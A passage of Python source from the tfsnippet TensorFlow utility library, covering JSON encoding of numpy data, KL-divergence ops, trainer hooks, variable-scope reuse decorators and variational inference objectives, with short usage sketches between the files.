self._ref_dict = {}
def _default_object_handler(self, o):
if isinstance(o, JsonBinary):
cnt = b64encode(o.value).decode('utf-8')
yield {'__type__': 'binary', 'data': cnt}
elif isinstance(o, (np.integer, np.int, np.uint,
np.int8, np.int16, np.int32, np.int64,
np.uint8, np.uint16, np.uint32, np.uint64)):
yield int(o)
elif isinstance(o, (np.float, np.float16, np.float32, np.float64)):
yield float(o)
elif isinstance(o, np.ndarray):
yield {
'__type__': 'ndarray',
'data': o.tolist(),
'dtype': str(o.dtype)
}
#: List of object serialization handlers
OBJECT_HANDLERS = [_default_object_handler]
def clear_object_ref(self):
"""Clear all serialized object references."""
self._ref_dict.clear()
def default(self, o):
o_id = id(o)
if self.object_ref:
if o_id in self._ref_dict:
return {'__type__': 'ObjectRef', '__id__': self._ref_dict[o_id]}
for handler in self.OBJECT_HANDLERS:
for obj in handler(self, o):
if self.object_ref and isinstance(obj, dict) and \
not isinstance(o, self.NO_REF_TYPES):
self._ref_dict[o_id] = len(self._ref_dict)
obj['__id__'] = self._ref_dict[o_id]
return obj
return super(JsonEncoder, self).default(o)
def encode(self, o):
self.clear_object_ref()
return super(JsonEncoder, self).encode(o)
class JsonDecoder(json.JSONDecoder):
"""
Extended JSON decoder coupled with :class:`JsonEncoder`.
Note that a `JsonDecoder` instance is designed to be used only once.
"""
def __init__(self, **kwargs):
self._object_hook = kwargs.get('object_hook', None)
self._ref_dict = {}
kwargs['object_hook'] = self._injected_object_hook
super(JsonDecoder, self).__init__(**kwargs)
def _default_object_handler(self, v):
v_type = v['__type__']
if v_type == 'binary':
yield JsonBinary(b64decode(v['data']))
elif v_type == 'ndarray':
yield np.asarray(v['data'], dtype=v['dtype'])
#: List of object deserialization handlers
OBJECT_HANDLERS = [_default_object_handler]
def _injected_object_hook(self, v):
v_type = v.get('__type__', None)
if v_type == 'ObjectRef':
v_id = v['__id__']
if v_id not in self._ref_dict:
raise KeyError('Object reference %r is not defined.' % (v_id,))
return self._ref_dict[v_id]
elif v_type is not None:
for handler in self.OBJECT_HANDLERS:
for o in handler(self, v):
v_id = v.get('__id__', None)
if v_id is not None:
self._ref_dict[v_id] = o
return o
if self._object_hook is not None:
v = self._object_hook(v)
return v
```
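A round-trip sketch for the encoder/decoder pair above. The module path `tfsnippet.examples.utils.jsonutils` is an assumption based on the file location, and the payload values are arbitrary.
```python
import json

import numpy as np

from tfsnippet.examples.utils.jsonutils import JsonBinary, JsonDecoder, JsonEncoder

obj = {
    'weights': np.arange(4, dtype=np.float32),  # -> {'__type__': 'ndarray', ...}
    'blob': JsonBinary(b'\x00\x01\x02'),        # -> {'__type__': 'binary', ...}
}
text = json.dumps(obj, cls=JsonEncoder)
restored = json.loads(text, cls=JsonDecoder)

assert isinstance(restored['weights'], np.ndarray)
assert restored['blob'] == JsonBinary(b'\x00\x01\x02')
```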
#### File: tfsnippet/mathops/kld.py
```python
from .softmax import log_softmax, softmax
__all__ = ['softmax_logits_kld', 'softmax_probs_kld']
def softmax_logits_kld(ops, p_logits, q_logits, keepdims=False):
"""
Compute the KL-divergence between two softmax categorical distributions
via logits. The last dimension of `p` and `q` are treated as the
softmax dimension, and will be reduced for computing KL-divergence.
.. math::
\\operatorname{D}_{KL}(p(y)\\|q(y)) =
\\sum_y p(y) \\left(\\log p(y) - \\log q(y)\\right)
Args:
ops (npyops or tfops): The math operations module.
p_logits: Logits of softmax categorical :math:`p(y)`.
q_logits: Logits of softmax categorical :math:`q(y)`.
keepdims (bool): Whether or not to keep the reduced dimension?
(default :obj:`False`)
Returns:
The computed softmax categorical distributions KL-divergence.
"""
p_logits = ops.convert_to_tensor(p_logits)
q_logits = ops.convert_to_tensor(q_logits)
with ops.name_scope('softmax_logits_kld', values=[p_logits, q_logits]):
log_p = log_softmax(ops, p_logits)
log_q = log_softmax(ops, q_logits)
p = softmax(ops, p_logits)
# TODO: can we reduce time consumption by ``np.exp(log_p)``?
# p = ops.exp(log_p)
return ops.reduce_sum(p * (log_p - log_q), axis=-1, keepdims=keepdims)
def softmax_probs_kld(ops, p_probs, q_probs, keepdims=False, clip_eps=1e-7):
"""
Compute the KL-divergence between two softmax categorical distributions
via probs. The last dimension of `p` and `q` are treated as the
softmax dimension, and will be reduced for computing KL-divergence.
.. math::
\\operatorname{D}_{KL}(p(y)\\|q(y)) =
\\sum_y p(y) \\left(\\log p(y) - \\log q(y)\\right)
Args:
ops (npyops or tfops): The math operations module.
p_probs: Probabilities of softmax categorical :math:`p(y)`.
q_probs: Probabilities of softmax categorical :math:`q(y)`.
keepdims (bool): Whether or not to keep the reduced dimension?
(default :obj:`False`)
clip_eps: The epsilon value for clipping `p_probs` and `q_probs`,
in order to avoid numerical issues. (default ``1e-7``)
Returns:
The computed softmax categorical distributions KL-divergence.
"""
p_probs = ops.convert_to_tensor(p_probs)
q_probs = ops.convert_to_tensor(q_probs)
with ops.name_scope('softmax_probs_kld', values=[p_probs, q_probs]):
# clip the probabilities to avoid nans
log_p = ops.log(ops.clip_by_value(p_probs, clip_eps, 1. - clip_eps))
log_q = ops.log(ops.clip_by_value(q_probs, clip_eps, 1. - clip_eps))
return ops.reduce_sum(p_probs * (log_p - log_q), axis=-1,
keepdims=keepdims)
```
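To make the formula concrete, here is the same KL-divergence evaluated directly with NumPy for a pair of 3-way categorical distributions; this bypasses the `ops` abstraction and only illustrates the math that both functions implement.
```python
import numpy as np

p = np.array([0.7, 0.2, 0.1])
q = np.array([0.5, 0.3, 0.2])

# D_KL(p || q) = sum_y p(y) * (log p(y) - log q(y))
kld = np.sum(p * (np.log(p) - np.log(q)))
print(kld)  # approximately 0.085, and always >= 0
```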
#### File: modules/container/lambda_.py
```python
from ..base import Module
__all__ = ['Lambda']
class Lambda(Module):
"""
Wrapping arbitrary function into a neural network :class:`Module`.
This class wraps an arbitrary function or lambda expression into
a neural network :class:`Module`, reusing the variables created
within the specified function.
For example, one may wrap :func:`tensorflow.contrib.layers.fully_connected`
into a reusable module with :class:`Lambda` component as follows:
.. code-block:: python
import functools
from tensorflow.contrib import layers
dense = Lambda(
functools.partial(
layers.fully_connected,
num_outputs=100,
activation_fn=tf.nn.relu
)
)
"""
def __init__(self, f, name=None, scope=None):
"""
Construct the :class:`Lambda`.
Args:
f ((inputs, \**kwargs) -> outputs): The function or lambda
expression which derives the outputs.
name (str): Optional name of this module
(argument of :class:`~tfsnippet.utils.VarScopeObject`).
scope (str): Optional scope of this module
(argument of :class:`~tfsnippet.utils.VarScopeObject`).
"""
super(Lambda, self).__init__(name=name, scope=scope)
self._factory = f
def _forward(self, inputs, **kwargs):
return self._factory(inputs, **kwargs)
```
#### File: tfsnippet/trainer/hooks.py
```python
__all__ = [
'HookPriority', 'HookEntry', 'HookList',
]
class HookPriority(object):
"""
Pre-defined hook priorities for :class:`~tfsnippet.trainer.BaseTrainer`
and :class:`~tfsnippet.trainer.Evaluator`.
Smaller values take higher priorities.
"""
EVALUATION = VALIDATION = 500
DEFAULT = 1000
ANNEALING = 1500
LOGGING = 10000
class HookEntry(object):
"""Configurations of a hook entry in :class:`HookList`."""
def __init__(self, callback, freq, priority, birth):
"""
Construct a new :class:`HookEntry`.
Args:
callback (() -> any): The callable object, as the hook callback.
freq (int): The frequency for this callback to be called.
priority (int): The hook priority. Smaller number has higher
priority when the hooks are called.
birth (int): The counter of birth, as an additional key for
sorting the hook entries, such that old hooks will be
placed in front of newly added hooks, if they have the
same priority.
"""
self.callback = callback
self.freq = freq
self.priority = priority
self.counter = freq
self.birth = birth
def reset_counter(self):
"""Reset the `counter` to `freq`, its initial value."""
self.counter = self.freq
def maybe_call(self):
"""
Decrease the `counter`, and call the `callback` if `counter` is less
than 1. The counter will be reset to `freq` afterwards.
"""
self.counter -= 1
if self.counter < 1:
# put this statement before calling the callback, such that
# the remaining counter would be correctly updated even if
# any error occurs
self.counter = self.freq
self.callback()
def sort_key(self):
"""Get the key for sorting this hook entry."""
return self.priority, self.birth
class HookList(object):
"""
Class for managing hooks in :class:`~tfsnippet.trainer.BaseTrainer`
and :class:`~tfsnippet.trainer.Evaluator`.
A hook is a registered callback that the trainers will call at certain
times during the training process. Apart from the callback method,
each hook has a `freq` and a `priority`.
* The `freq` controls how often the particular hook should be called,
e.g., every 2 epochs.
* The `priority` determines the priority (order) of calling the hooks.
Smaller number corresponds to higher priority.
"""
def __init__(self):
"""Construct a new :class:`HookList`."""
self._hooks = [] # type: list[HookEntry]
self._birth_counter = 0 # to enforce stable ordering
def add_hook(self, callback, freq=1, priority=HookPriority.DEFAULT):
"""
Add a hook into the list.
Args:
callback (() -> any): The callable object, as the hook callback.
freq (int): The frequency for this callback to be called.
priority (int): The hook priority. Smaller number has higher
priority when the hooks are called.
"""
freq = int(freq)
if freq < 1:
raise ValueError('`freq` must be at least 1.')
self._birth_counter += 1
self._hooks.append(HookEntry(
callback=callback, freq=freq, priority=priority,
birth=self._birth_counter
))
self._hooks.sort(key=lambda e: e.sort_key())
def call_hooks(self):
"""
Call all the registered hooks.
If any of the hook raises an error, it will stop the calling chain,
and propagate the error to upper caller.
"""
for e in self._hooks:
e.maybe_call()
def reset(self):
"""Reset the frequency counter of all hooks."""
for e in self._hooks:
e.reset_counter()
def remove(self, callback):
"""
Remove all hooks having the specified `callback`.
Args:
callback: The callback of the hooks to be removed.
Returns:
int: The number of removed hooks.
"""
return self.remove_if(lambda c, f, t: c == callback)
def remove_all(self):
"""
Remove all hooks.
Returns:
int: The number of removed hooks.
"""
pre_count = len(self._hooks)
self._hooks = []
return pre_count
def remove_by_priority(self, priority):
"""
Remove all hooks having the specified `priority`.
Args:
priority (int): The priority of the hooks to be removed.
Returns:
int: The number of removed hooks.
"""
return self.remove_if(lambda c, f, t: t == priority)
def remove_if(self, condition):
"""
Remove all hooks matching the specified `condition`.
Args:
condition ((callback, freq, priority) -> bool): A callable object
to tell whether or not a hook should be removed.
Returns:
int: The number of removed hooks.
"""
pre_count = len(self._hooks)
self._hooks = [
e for e in self._hooks
if not condition(e.callback, e.freq, e.priority)
]
return pre_count - len(self._hooks)
def __repr__(self):
payload = ','.join(
'{!r}:{}'.format(e.callback, e.freq)
for e in self._hooks
)
if payload:
return 'HookList({})'.format(payload)
else:
return 'HookList()'
```
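A small sketch of the frequency/priority semantics, importing directly from the module defined above (the module path is assumed from the file location). `eval` fires on every call, `log` on every second call, and `eval` always runs first because `EVALUATION` (500) outranks `LOGGING` (10000).
```python
from tfsnippet.trainer.hooks import HookList, HookPriority

calls = []
hooks = HookList()
hooks.add_hook(lambda: calls.append('eval'), freq=1, priority=HookPriority.EVALUATION)
hooks.add_hook(lambda: calls.append('log'), freq=2, priority=HookPriority.LOGGING)

for _ in range(4):
    hooks.call_hooks()

assert calls == ['eval', 'eval', 'log', 'eval', 'eval', 'log']
```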
#### File: tfsnippet/utils/concepts.py
```python
__all__ = [
'AutoInitAndCloseable',
'Disposable',
'NoReentrantContext',
'DisposableContext',
]
class AutoInitAndCloseable(object):
"""
Classes with :meth:`init()` to initialize their internal states, and also
:meth:`close()` to destroy these states. The :meth:`init()` method can
be called repeatedly, and will perform the initialization only at the first
call. Thus other methods may always call :meth:`init()` at the beginning,
which brings auto-initialization to the class.
A context manager is implemented: :meth:`init()` is explicitly called
when entering the context, while :meth:`close()` is called when
exiting the context.
"""
_initialized = False
def _init(self):
"""Override this method to initialize the internal states."""
raise NotImplementedError()
def init(self):
"""Ensure the internal states are initialized."""
if not self._initialized:
self._init()
self._initialized = True
def __enter__(self):
"""Ensure the internal states are initialized."""
self.init()
return self
def _close(self):
"""Override this method to destroy the internal states."""
raise NotImplementedError()
def close(self):
"""Ensure the internal states are destroyed."""
if self._initialized:
try:
self._close()
finally:
self._initialized = False
def __exit__(self, exc_type, exc_val, exc_tb):
"""Cleanup the internal states."""
self.close()
class Disposable(object):
"""
Classes which can only be used once.
"""
_already_used = False
def _check_usage_and_set_used(self):
"""
Check the usage flag to ensure the object has not been used,
and then mark it as used.
"""
if self._already_used:
raise RuntimeError('Disposable object cannot be used twice: {!r}.'.
format(self))
self._already_used = True
class NoReentrantContext(object):
"""
Base class for contexts which are not reentrant (i.e., if there is
a context opened by ``__enter__``, and it has not called ``__exit__``,
the ``__enter__`` cannot be called again).
"""
_is_entered = False
def _enter(self):
"""
Enter the context. Subclasses should override this instead of
the true ``__enter__`` method.
"""
raise NotImplementedError()
def _exit(self, exc_type, exc_val, exc_tb):
"""
Exit the context. Subclasses should override this instead of
the true ``__exit__`` method.
"""
raise NotImplementedError()
def _require_entered(self):
"""
Require the context to be entered.
Raises:
RuntimeError: If the context is not entered.
"""
if not self._is_entered:
raise RuntimeError('Context is required to be entered: {!r}.'.
format(self))
def __enter__(self):
if self._is_entered:
raise RuntimeError('Context is not reentrant: {!r}.'.
format(self))
ret = self._enter()
self._is_entered = True
return ret
def __exit__(self, exc_type, exc_val, exc_tb):
if self._is_entered:
self._is_entered = False
return self._exit(exc_type, exc_val, exc_tb)
class DisposableContext(NoReentrantContext):
"""
Base class for contexts which can only be entered once.
"""
_has_entered = False
def __enter__(self):
if self._has_entered:
raise RuntimeError(
'A disposable context cannot be entered twice: {!r}.'.
format(self))
ret = super(DisposableContext, self).__enter__()
self._has_entered = True
return ret
```
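A minimal subclass sketch showing the intended contract of `AutoInitAndCloseable`: `_init()`/`_close()` hold the resource logic, while `init()`, `close()` and the context manager guard against repeated initialization. The temporary-file resource is just for illustration.
```python
import tempfile

from tfsnippet.utils import AutoInitAndCloseable


class TempWriter(AutoInitAndCloseable):
    """Writes to a temporary file that is opened lazily on first use."""

    def _init(self):
        # acquires the resource only once, however often init() is called
        self._file = tempfile.NamedTemporaryFile(mode='w')

    def _close(self):
        self._file.close()

    def write(self, text):
        self.init()  # auto-initialization before first use
        self._file.write(text)


with TempWriter() as w:  # __enter__ calls init(), __exit__ calls close()
    w.write('hello')
```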
#### File: tfsnippet/utils/reuse.py
```python
import inspect
import functools
import weakref
from contextlib import contextmanager
import six
import tensorflow as tf
from .scope import reopen_variable_scope, root_variable_scope
__all__ = ['auto_reuse_variables', 'instance_reuse', 'global_reuse']
@contextmanager
def auto_reuse_variables(name_or_scope, reopen_name_scope=False, **kwargs):
"""
Open a variable scope as a context, automatically choosing `reuse` flag.
The `reuse` flag will be set to :obj:`False` if the variable scope is
opened for the first time, and it will be set to :obj:`True` each time
the variable scope is opened again.
Args:
name_or_scope (str or tf.VariableScope): The name of the variable
scope, or the variable scope to open.
reopen_name_scope (bool): Whether or not to re-open the original name
scope of `name_or_scope`? This option takes effect only if
`name_or_scope` is actually an instance of
:class:`tf.VariableScope`.
\**kwargs: Named arguments for opening the variable scope.
Yields:
tf.VariableScope: The opened variable scope.
"""
if not name_or_scope:
raise ValueError('`name_or_scope` cannot be empty. If you want to '
'auto-reuse variables in root variable scope, you '
'should capture the root variable scope instance '
'and call `auto_reuse_variables` on that, instead '
'of calling with an empty name')
if reopen_name_scope:
if not isinstance(name_or_scope, tf.VariableScope):
raise ValueError('`reopen_name_scope` can be set to True '
'only if `name_or_scope` is an instance of '
'`tf.VariableScope`')
def generate_context():
return reopen_variable_scope(name_or_scope, **kwargs)
else:
def generate_context():
return tf.variable_scope(name_or_scope, **kwargs)
with generate_context() as vs:
# check whether or not the variable scope has been initialized
graph = tf.get_default_graph()
if graph not in __auto_reuse_variables_graph_dict:
__auto_reuse_variables_graph_dict[graph] = set([])
initialized_scopes = __auto_reuse_variables_graph_dict[graph]
reuse = vs.name in initialized_scopes
# if `reuse` is True, set the reuse flag
if reuse:
vs.reuse_variables()
yield vs
else:
yield vs
initialized_scopes.add(vs.name)
#: dict to track the initialization state for each variable scope
#: belonging to every living graph.
__auto_reuse_variables_graph_dict = weakref.WeakKeyDictionary()
def instance_reuse(method=None, scope=None):
"""
Decorate an instance method within :func:`auto_reuse_variables` context.
This decorator should be applied to unbound instance methods, and
the instance that owns the methods should have :attr:`variable_scope`
attribute. For example:
.. code-block:: python
class Foo(object):
def __init__(self, name):
with tf.variable_scope(name) as vs:
self.variable_scope = vs
@instance_reuse
def foo(self):
return tf.get_variable('bar', ...)
The above example is then equivalent to the following code:
.. code-block:: python
class Foo(object):
def __init__(self, name):
with tf.variable_scope(name) as vs:
self.variable_scope = vs
def foo(self):
with reopen_variable_scope(self.variable_scope):
with auto_reuse_variables('foo'):
return tf.get_variable('bar', ...)
By default the name of the variable scope should be equal to the name
of the decorated method, and the name scope within the context should
be equal to the variable scope name, plus some suffix to make it unique.
The variable scope name can be set by `scope` argument, for example:
.. code-block:: python
class Foo(object):
@instance_reuse(scope='scope_name')
def foo(self):
return tf.get_variable('bar', ...)
Note that the variable reusing is based on the name of the variable
scope, rather than the method. As a result, two methods with the same
`scope` argument will reuse the same set of variables. For example:
.. code-block:: python
class Foo(object):
@instance_reuse(scope='foo')
def foo_1(self):
return tf.get_variable('bar', ...)
@instance_reuse(scope='foo')
def foo_2(self):
return tf.get_variable('bar', ...)
These two methods will return the same `bar` variable.
Args:
scope (str): The name of the variable scope. If not set, will use the
method name as scope name. This argument must be specified as named
argument.
See Also:
:func:`tfsnippet.utils.global_reuse`
"""
if method is None:
return functools.partial(instance_reuse, scope=scope)
# check whether or not `method` looks like an instance method
if six.PY2:
getargspec = inspect.getargspec
else:
getargspec = inspect.getfullargspec
if inspect.ismethod(method):
raise TypeError('`method` is expected to be unbound instance method')
argspec = getargspec(method)
if not argspec.args or argspec.args[0] != 'self':
raise TypeError('`method` seems not to be an instance method '
'(whose first argument should be `self`)')
# determine the scope name
scope = scope or method.__name__
@six.wraps(method)
def wrapper(*args, **kwargs):
obj = args[0]
variable_scope = obj.variable_scope
if not isinstance(variable_scope, tf.VariableScope):
raise TypeError('`variable_scope` attribute of the instance {!r} '
'is expected to be a `tf.VariableScope`, but got '
'{!r}'.format(obj, variable_scope))
with reopen_variable_scope(variable_scope):
with auto_reuse_variables(scope):
return method(*args, **kwargs)
return wrapper
def global_reuse(method=None, scope=None):
"""
Decorate a function within :func:`auto_reuse_variables` scope globally.
Any function or method applied with this decorator will be called within
a variable scope opened first by :func:`root_variable_scope`, then by
:func:`auto_reuse_variables`. That is to say, the following code:
.. code-block:: python
@global_reuse
def foo():
return tf.get_variable('bar', ...)
bar = foo()
is equivalent to:
.. code-block:: python
with root_variable_scope():
with auto_reuse_variables('foo'):
bar = tf.get_variable('bar', ...)
By default the name of the variable scope should be equal to the name
of the decorated method, and the name scope within the context should
be equal to the variable scope name, plus some suffix to make it unique.
The variable scope name can be set by `scope` argument, for example:
.. code-block:: python
@global_reuse(scope='dense')
def dense_layer(inputs):
w = tf.get_variable('w', ...)
b = tf.get_variable('b', ...)
return tf.matmul(w, inputs) + b
Note that the variable reusing is based on the name of the variable
scope, rather than the function object. As a result, two functions
with the same name, or with the same `scope` argument, will reuse
the same set of variables. For example:
.. code-block:: python
@global_reuse(scope='foo')
def foo_1():
return tf.get_variable('bar', ...)
@global_reuse(scope='foo')
def foo_2():
return tf.get_variable('bar', ...)
These two functions will return the same `bar` variable.
Args:
scope (str): The name of the variable scope. If not set, will use the
function name as scope name. This argument must be specified as
named argument.
See Also:
:func:`tfsnippet.utils.instance_reuse`
"""
if method is None:
return functools.partial(global_reuse, scope=scope)
scope = scope or method.__name__
@six.wraps(method)
def wrapper(*args, **kwargs):
with root_variable_scope():
with auto_reuse_variables(scope):
return method(*args, **kwargs)
return wrapper
```
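The following sketch (TensorFlow 1.x graph mode) illustrates the reuse behaviour documented above: calling a `@global_reuse` function twice returns the very same variable object.
```python
import tensorflow as tf

from tfsnippet.utils import global_reuse


@global_reuse
def foo():
    return tf.get_variable('bar', shape=(), dtype=tf.float32)


a = foo()  # first call creates the variable under scope 'foo'
b = foo()  # second call re-opens the scope with reuse=True
assert a is b
```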
#### File: tfsnippet/utils/scope.py
```python
from contextlib import contextmanager
import six
import tensorflow as tf
from tensorflow.python.ops import variable_scope as variable_scope_ops
from .doc_inherit import DocInherit
from .misc import camel_to_underscore
__all__ = ['reopen_variable_scope', 'root_variable_scope', 'VarScopeObject']
@contextmanager
def reopen_variable_scope(var_scope, **kwargs):
"""
Reopen the specified `var_scope` and its original name scope.
Unlike :func:`tf.variable_scope`, which does not open the original name
scope even if a stored :class:`tf.VariableScope` instance is specified,
this method opens exactly the same name scope as the original one.
Args:
var_scope (tf.VariableScope): The variable scope instance.
**kwargs: Named arguments for opening the variable scope.
"""
if not isinstance(var_scope, tf.VariableScope):
raise TypeError('`var_scope` must be an instance of `tf.VariableScope`')
old_name_scope = var_scope.original_name_scope
with variable_scope_ops._pure_variable_scope(var_scope, **kwargs) as vs:
name_scope = old_name_scope
if name_scope and not name_scope.endswith('/'):
name_scope += '/' # pragma: no cover
with tf.name_scope(name_scope):
yield vs
@contextmanager
def root_variable_scope(**kwargs):
"""
Open the root variable scope and its name scope.
Args:
**kwargs: Named arguments for opening the root variable scope.
"""
# `tf.variable_scope` does not support opening the root variable scope
# from an empty name. It always prepends the name of the current variable
# scope to the front of the opened variable scope. So we get the current
# scope, and temporarily pretend it is the root scope.
scope = tf.get_variable_scope()
old_name = scope.name
try:
scope._name = ''
with variable_scope_ops._pure_variable_scope('', **kwargs) as vs:
scope._name = old_name
with tf.name_scope(None):
yield vs
finally:
scope._name = old_name
@DocInherit
class VarScopeObject(object):
"""
Base class for object that owns a variable scope.
It is typically used along with :func:`~tfsnippet.utils.instance_reuse`.
"""
def __init__(self, name=None, scope=None):
"""
Construct the :class:`VarScopeObject`.
Args:
name (str): Name of this object. A unique variable scope name
would be picked up according to this argument, if `scope` is
not specified. If both this argument and `scope` is not
specified, the underscored class name would be considered as
`name`. This argument will be stored and can be accessed via
:attr:`name` attribute of the instance. If not specified,
:attr:`name` would be :obj:`None`.
scope (str): Scope of this object. If specified, it will be used
as the variable scope name, even if another object has already
taken the same scope. That is to say, these two objects will
share the same variable scope.
"""
scope = scope or None
name = name or None
if not scope and not name:
default_name = camel_to_underscore(self.__class__.__name__)
default_name = default_name.lstrip('_')
else:
default_name = name
with tf.variable_scope(scope, default_name=default_name) as vs:
self._variable_scope = vs # type: tf.VariableScope
self._name = name
def __repr__(self):
return '{}({!r})'.format(
self.__class__.__name__, self.variable_scope.name)
@property
def name(self):
"""Get the name of this object."""
return self._name
@property
def variable_scope(self):
"""Get the variable scope of this object."""
return self._variable_scope
def get_variables_as_dict(self, sub_scope=None,
collection=tf.GraphKeys.GLOBAL_VARIABLES,
strip_sub_scope=True):
"""
Get the variables created inside this :class:`VarScopeObject`.
This method will collect variables from specified `collection`,
which are created in the :attr:`variable_scope` of this object
(or in the `sub_scope` of :attr:`variable_scope`, if `sub_scope`
is not :obj:`None`).
Args:
sub_scope (str): The sub-scope of :attr:`variable_scope`.
collection (str): The collection from which to collect variables.
(default ``tf.GraphKeys.GLOBAL_VARIABLES``).
strip_sub_scope (bool): Whether or not to also strip the common
prefix of `sub_scope`? (default :obj:`True`)
Returns:
dict[str, tf.Variable]: Dict which maps from the relative names of
variables to variable objects. By `relative names` we mean the
full names of variables, without the common prefix of
:attr:`variable_scope` (and `sub_scope` if `strip_sub_scope`
is :obj:`True`).
"""
from tfsnippet.utils.session import get_variables_as_dict
scope_name = self.variable_scope.name
if sub_scope:
sub_scope = sub_scope.strip('/')
if scope_name and not scope_name.endswith('/'):
scope_name += '/'
scope_name += sub_scope
ret = get_variables_as_dict(scope_name, collection)
if not strip_sub_scope and sub_scope:
sub_scope += '/'
ret = {sub_scope + k: v for k, v in six.iteritems(ret)}
return ret
```
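A short sketch tying `VarScopeObject` together with `instance_reuse` from the previous file; the class name, variable shape, and the assumption that both names are re-exported from `tfsnippet.utils` are illustrative.
```python
import tensorflow as tf

from tfsnippet.utils import VarScopeObject, instance_reuse


class MyModule(VarScopeObject):
    @instance_reuse
    def weight(self):
        return tf.get_variable('w', shape=[3, 3], dtype=tf.float32)


m = MyModule(name='my_module')
w1 = m.weight()
w2 = m.weight()
assert w1 is w2  # the variable is reused across calls
print(m.get_variables_as_dict())  # e.g. {'weight/w': <tf.Variable ...>}
```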
#### File: tfsnippet/variational/inference.py
```python
import tensorflow as tf
import zhusuan as zs
from .estimators import *
from .evaluation import *
from .objectives import *
from .utils import _require_multi_samples
__all__ = [
'VariationalInference',
'VariationalLowerBounds',
'VariationalTrainingObjectives',
'VariationalEvaluation'
]
class VariationalInference(object):
"""Class for variational inference."""
def __init__(self, log_joint, latent_log_probs, axis=None):
"""
Construct the :class:`VariationalInference`.
Args:
log_joint (tf.Tensor): The log-joint of model.
latent_log_probs (Iterable[tf.Tensor]): The log-densities
of latent variables from the variational net.
axis: The axis or axes to be considered as the sampling dimensions
of latent variables. The specified axes will be summed up in
the variational lower-bounds or training objectives.
(default :obj:`None`)
"""
self._log_joint = tf.convert_to_tensor(log_joint)
self._latent_log_probs = tuple(tf.convert_to_tensor(t)
for t in latent_log_probs)
self._latent_log_prob = tf.add_n(
self._latent_log_probs, name='latent_log_prob')
self._axis = axis
self._lower_bound = VariationalLowerBounds(self)
self._training = VariationalTrainingObjectives(self)
self._evaluation = VariationalEvaluation(self)
@property
def log_joint(self):
"""
Get the log-joint of the model.
Returns:
tf.Tensor: The log-joint of the model.
"""
return self._log_joint
@property
def latent_log_probs(self):
"""
Get the log-densities of latent variables.
Returns:
tuple[tf.Tensor]: The log-densities of latent variables.
"""
return self._latent_log_probs
@property
def latent_log_prob(self):
"""
Get the summed log-density of latent variables.
Returns:
tf.Tensor: The summed log-density of latent variables.
"""
return self._latent_log_prob
@property
def axis(self):
"""
Get the axis or axes to be considered as the sampling dimensions
of latent variables.
"""
return self._axis
def zs_objective(self, func, **kwargs):
"""
Create a :class:`zhusuan.variational.VariationalObjective` with
pre-computed log-joint, by specified algorithm.
Args:
func: The variational algorithm from ZhuSuan. Supported
functions are: 1. :func:`zhusuan.variational.elbo`
2. :func:`zhusuan.variational.importance_weighted_objective`
3. :func:`zhusuan.variational.klpq`
\**kwargs: Named arguments passed to `func`.
Returns:
zhusuan.variational.VariationalObjective: The constructed
per-data variational objective.
"""
return func(
log_joint=lambda observed: self._log_joint,
observed={},
latent={i: (None, log_prob)
for i, log_prob in enumerate(self._latent_log_probs)},
axis=self._axis,
**kwargs
)
def zs_elbo(self):
"""
Create a :class:`zhusuan.variational.EvidenceLowerBoundObjective`,
with pre-computed log-joint.
Returns:
zhusuan.variational.EvidenceLowerBoundObjective: The constructed
per-data ELBO objective.
"""
return self.zs_objective(zs.variational.elbo)
def zs_importance_weighted_objective(self):
"""
Create a :class:`zhusuan.variational.ImportanceWeightedObjective`,
with pre-computed log-joint.
Returns:
zhusuan.variational.ImportanceWeightedObjective: The constructed
per-data importance weighted objective.
"""
return self.zs_objective(zs.variational.importance_weighted_objective)
def zs_klpq(self):
"""
Create a :class:`zhusuan.variational.InclusiveKLObjective`,
with pre-computed log-joint.
Returns:
zhusuan.variational.InclusiveKLObjective: The constructed
per-data inclusive KL objective.
"""
return self.zs_objective(zs.variational.klpq)
@property
def lower_bound(self):
"""
Get the factory for variational lower-bounds.
Returns:
VariationalLowerBounds: The factory for variational lower-bounds.
"""
return self._lower_bound
@property
def training(self):
"""
Get the factory for training objectives.
Returns:
VariationalTrainingObjectives: The factory for training objectives.
"""
return self._training
@property
def evaluation(self):
"""
Get the factory for evaluation outputs.
Returns:
VariationalEvaluation: The factory for evaluation outputs.
"""
return self._evaluation
class VariationalLowerBounds(object):
"""Factory for variational lower-bounds."""
def __init__(self, vi):
"""
Construct a new :class:`VariationalEvaluation`.
Args:
vi (VariationalInference): The variational inference object.
"""
self._vi = vi
def elbo(self, name=None):
"""
Get the evidence lower-bound.
Args:
name (str): Name of this operation in TensorFlow graph.
(default "elbo")
Returns:
tf.Tensor: The evidence lower-bound.
See Also:
:func:`tfsnippet.variational.elbo_objective`
"""
return elbo_objective(
log_joint=self._vi.log_joint,
latent_log_prob=self._vi.latent_log_prob,
axis=self._vi.axis,
name=name or 'elbo'
)
def monte_carlo_objective(self, name=None):
"""
Get the importance weighted lower-bound.
Args:
name (str): Name of this operation in TensorFlow graph.
(default "monte_carlo_objective")
Returns:
tf.Tensor: The per-data importance weighted lower-bound.
See Also:
:func:`tfsnippet.variational.monte_carlo_objective`
"""
_require_multi_samples(self._vi.axis, 'monte carlo objective')
return monte_carlo_objective(
log_joint=self._vi.log_joint,
latent_log_prob=self._vi.latent_log_prob,
axis=self._vi.axis,
name=name or 'monte_carlo_objective'
)
importance_weighted_objective = monte_carlo_objective # Legacy name
class VariationalTrainingObjectives(object):
"""Factory for variational training objectives."""
def __init__(self, vi):
"""
Construct a new :class:`VariationalEvaluation`.
Args:
vi (VariationalInference): The variational inference object.
"""
self._vi = vi
def sgvb(self, name=None):
"""
Get the SGVB training objective.
Args:
name (str): Name of this operation in TensorFlow graph.
(default "sgvb")
Returns:
tf.Tensor: The per-data SGVB training objective.
It is the negative of ELBO, which should directly be minimized.
See Also:
:func:`tfsnippet.variational.sgvb_estimator`
"""
with tf.name_scope(name, default_name='sgvb'):
return -sgvb_estimator(
values=self._vi.log_joint - self._vi.latent_log_prob,
axis=self._vi.axis
)
def reinforce(self, variance_reduction=True, baseline=None, decay=0.8,
name=None):
"""
Get the REINFORCE training objective.
Args:
variance_reduction (bool): Whether to use variance reduction.
baseline (tf.Tensor): A trainable estimation for the scale of
the elbo value.
decay (float): The moving average decay for variance normalization.
name (str): Name of this operation in TensorFlow graph.
(default "reinforce")
Returns:
tf.Tensor: The per-data REINFORCE training objective.
See Also:
:meth:`zhusuan.variational.EvidenceLowerBoundObjective.reinforce`
"""
# reinforce requires extra variables to collect the moving average
# statistics, so we need to generate a variable scope
with tf.variable_scope(name, default_name='reinforce'):
return self._vi.zs_elbo().reinforce(
variance_reduction=variance_reduction,
baseline=baseline,
decay=decay,
)
def iwae(self, name=None):
